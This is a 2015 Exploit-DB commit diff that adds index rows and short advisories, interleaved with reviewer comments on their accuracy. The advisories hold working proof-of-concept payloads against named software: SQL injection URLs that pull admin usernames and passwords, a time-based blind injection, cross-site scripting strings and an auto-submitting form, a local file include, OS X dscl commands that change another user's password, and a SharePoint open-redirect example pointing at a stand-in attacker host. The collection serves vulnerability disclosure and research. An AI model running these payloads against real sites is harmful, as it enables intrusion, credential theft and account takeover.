Update: 2015-02-22

12 new exploits
Offensive Security 2015-02-22 08:37:11 +00:00
parent 6bdf638d1b
commit 62f8955407
13 changed files with 213 additions and 0 deletions


@ -32555,6 +32555,18 @@ id,file,description,date,author,platform,type,port
36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0
36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0
36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0
36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0
36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0
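Review bot: the row for 36128 (`Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability`) is indexed as `windows,remote,0`, but the title describes a crash triggered by opening a malformed trace file, and the 36128.txt added in this same commit lists 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 as affected, so `<= 1.6.1` overstates the range and `windows`/`remote` do not fit a file-parsing bug in a cross-platform tool; `multiple` (as used for the CrushFTP row above) would be the better platform and the title should carry the same ranges as the file. The ids also skip 36132 between 36131 and 36133; if that entry was withheld on purpose, the commit message should say so rather than leaving a hole in the index.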


platforms/asp/webapps/36133.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49614/info
Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable.
http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E
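Review bot: only `Title` carries the payload; the other parameters in the request (`ChartName`, `NetObject`, `ResourceID`, `NetObjectPrefix`, `Rows`) are given fixed values without a word on whether they were tested, and the text does not say whether `/Orion/NetPerfMon/CustomChart.aspx` is reachable without an Orion login, which is what decides whether this is a pre-authentication reflected XSS. State the authentication requirement and the reflection context (the chart title), and replace the instance-specific `NetObject=N:355` and `ResourceID=17` with placeholders so readers do not assume those ids exist on their install.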

platforms/asp/webapps/36134.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/49620/info
Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
The following products are affected;
Microsoft SharePoint 2007
Microsoft SharePoint 2010
http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]
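Review bot: the placeholder in `NewForm.aspx?Source=[xss]` is labelled as an XSS payload, but the issue described is open redirection, so the PoC should show an external URL in `Source` (for example a placeholder such as `Source=http://attacker.example/`, which is a stand-in and not from the advisory) to demonstrate the redirect rather than a script string. The text also says "multiple URI open-redirection vulnerabilities" but names only one page; either list the other affected pages or state that every page honouring `Source` is affected.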

platforms/asp/webapps/36138.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49667/info
ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin
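Review bot: the payload `union select 0,kullaniciadi,sifre,3,4,5 from admin` presupposes a six-column result set and an `admin` table with `kullaniciadi`/`sifre` columns (Turkish for username/password), yet the text does not say how the column count was established or where on `haber.asp` the selected values are rendered, so a tester cannot distinguish a failed injection from a wrong column count. Add the `order by` or NULL-probe step that established six columns, or at least state it, and mark `id=28` as an instance-specific value.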

platforms/asp/webapps/36139.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/49668/info
Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/v1/urundetay.asp?id=21%28%29
http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
http://www.example.com/v1/linkler.asp?id=2%28%29
http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin
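Review bot: six of the seven URLs only append `%28%29` (`()`) to an integer `id`, which at most provokes a database error and does not by itself demonstrate injection; only the last URL (`catid=23+union+select 0,1,2,3,4,5 from admin`) shows data extraction. The `[SQL]` marker is present on three URLs and absent from the three `/v1/` ones with no explanation, and no product names or versions are given although the title says "Multiple Products", so readers cannot map a URL to a product. Record per URL the observed error or extracted data and the product and version it belongs to.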

platforms/asp/webapps/36141.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49674/info
Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]
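Review bot: the version string disagrees with the index: this file says `Aspgwy Access 1.0.0`, the files.csv row for 36141 says `Aspgwy Access 1.0`. The PoC passes an empty `search_word` and puts the payload in `matchword` but does not say whether the reflection is inside an attribute or in the page body, which determines whether `[XSS]` needs a closing quote or tag prefix. Pick one version string and state the reflection context.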

platforms/osx/local/36143.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49676/info
Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.
Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.
$ dscl localhost -read /Search/Users/bob
$ dscl localhost -passwd /Search/Users/<username>
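Review bot: the two `dscl` commands demonstrate two different issues (reading another user's record, and changing another user's password), but the text does not say at which local privilege level they were run (standard user versus admin) or which 10.7 build was tested, so "without sufficient privileges" cannot be verified from the file; also `/Search/Users/bob` in the first command and `<username>` in the second should use one placeholder convention. State the unprivileged account used and which sensitive attribute `-read` returned.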

platforms/php/webapps/36135.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49625/info
Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.
http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
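Review bot: the PoC path `wp-content/plugins/paid-downloads/download.php?download_key=` targets the Paid Downloads plugin, while the text here and the files.csv title for 36135 name the Auctions plugin and its `wpa_id` parameter; one of the two is wrong, and the request as written never exercises `wpa_id`. The payload `-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--` (the CHAR codes spell `sqlmap`) is a time-based blind probe, so the text should say the injection is blind/time-based and that the parameter is string-quoted, rather than implying direct data retrieval.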

platforms/php/webapps/36136.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49650/info
StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?language_file=[LFI]%00
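Review bot: the payload `language_file=[LFI]%00` relies on null-byte truncation of the include path, which PHP stopped honouring in 5.3.4, and the text does not give the PHP version tested; state it, and note that without `%00` the include only works if the attacker-controlled path already ends in whatever suffix the application appends. `[path]` and `[LFI]` are also left unspecified; one concrete traversal target would make the PoC checkable.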

platforms/php/webapps/36137.txt Executable file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/49660/info
PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GET
/login.php?action=out&amp;id=3&amp;csrf_token=4b072f27396cec5d79&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
GET
/misc.php?action=markforumread&amp;fid=1&amp;csrf_token=c173cabad786&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST /delete.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_confirm=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;delete=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /edit.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /login.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;request_pass=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oin
k)&lt;/script&gt;
POST /misc.php?email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;redirect_url=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_subject=&gt;&quot;&#039;&gt;&lt;script&gt;alert(o
ink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST
/profile.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_old_password=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_new_password1=&gt;&quot;&#039;&gt;&lt;scri
pt&gt;alert(oink)&lt;/script&gt;&amp;req_new_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;update=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST /register.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_username=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_password1=&gt;&quot;&#039;&gt;&lt;script&gt;alert
(oink)&lt;/script&gt;&amp;req_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(369448)&lt;/script&gt;&amp;req_email1=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;timezone=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;register=&gt;&quot;&#039;&gt;
&lt;script&gt;alert(oink)&lt;/script&gt;
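Review bot: the request lines are HTML-entity encoded (`&amp;`, `&quot;`, `&#039;`, `&lt;script&gt;`), so they cannot be replayed as shown and must be decoded first, and the POST bodies put the same payload into every parameter (`form_sent`, `csrf_token`, `req_*`, `submit`), so the file does not identify which parameter is actually reflected; one alert even differs (`alert(369448)` in `req_password2` of the register.php request), which reads like raw scanner output. In the two GET requests the payload is carried only by `csrf_token`, so that is the reflected field there; for the POSTs, list the reflected parameter per endpoint and decode the payloads.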

platforms/php/webapps/36140.txt Executable file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/49673/info
Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected.
Cross Site Scripting Vulnerabilities
<html>
<title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss(){document.forms["xss"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="currPath" value=&#039;"><script>alert(1)</script>&#039; />
<input type="hidden" name="path" value=&#039;"><script>alert(2)</script>&#039; />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br />
</body></html>
HTTP Response Splitting
====================================================================
/edit.php:
--------------------------------------------------------------------
3: $charSet = "iso-8859-1";
4: $dir = "ltr";
5:
6: if ( isset( $_POST[ "charSet" ] ) )
7: {
8: $charSet = $_POST[ "charSet" ];
9:
10: if ( $charSet == "windows-1255" )
11: {
12: $dir = "rtl";
13: }
14: }
15:
16: header( "Content-Type: text/html; charset=" . $charSet );
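Review bot: the response-splitting section quotes `edit.php` (`$charSet = $_POST["charSet"]` flowing into `header("Content-Type: text/html; charset=" . $charSet)`) but gives no request and no PHP version; PHP's `header()` has rejected values containing a newline since 5.1.2, so on any later PHP this is an unvalidated charset value (still an encoding/content-sniffing problem) rather than header injection. Add the POST used and the PHP version that reproduced the split. The XSS PoC for `editnavbar.php` (`currPath`, `path`) is a POST auto-submit page, and the text does not say whether that page requires an admin session, which changes the severity.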

platforms/php/webapps/36142.txt Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/49675/info
net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following products are affected:
net4visions iBrowser 1.4.1 Build 10182009
net4visions iManager 1.2.8 Build 02012008
net4visions iGallery 1.0.0
iBrowser Plugin
http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
iManager Plugin
http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
iGallery Plugin
http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
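Review bot: three of the five URLs hit `phpThumb.demo.random.php` under a bundled phpThumb `demo/` directory, i.e. sample scripts shipped inside the plugins; the remediation is to delete that demo directory in addition to fixing the `dir` parameter of the plugins' own `random.php`, and the text should say so. The iGallery path uses `scripts/pthumb/demo/` while iBrowser and iManager use `scripts/phpThumb/demo/`; confirm whether `pthumb` is the real directory name or a typo in the advisory.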

platforms/windows/remote/36128.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49521/info
Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable.
http://www.exploit-db.com/sploits/36128.pcap
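Review bot: the PoC is an opaque binary (`36128.pcap`) referenced by URL, and the text says only "fails to properly handle certain files" without naming the file format or dissector that crashes, so a reader cannot tell which of the 1.4.x/1.6.x fixes applies or write a detection; name the dissector or format and the crash type. The affected-version statement here (1.4.0 to 1.4.8 and 1.6.0 to 1.6.1) should also be the one used in the files.csv row, which says `<= 1.6.1`.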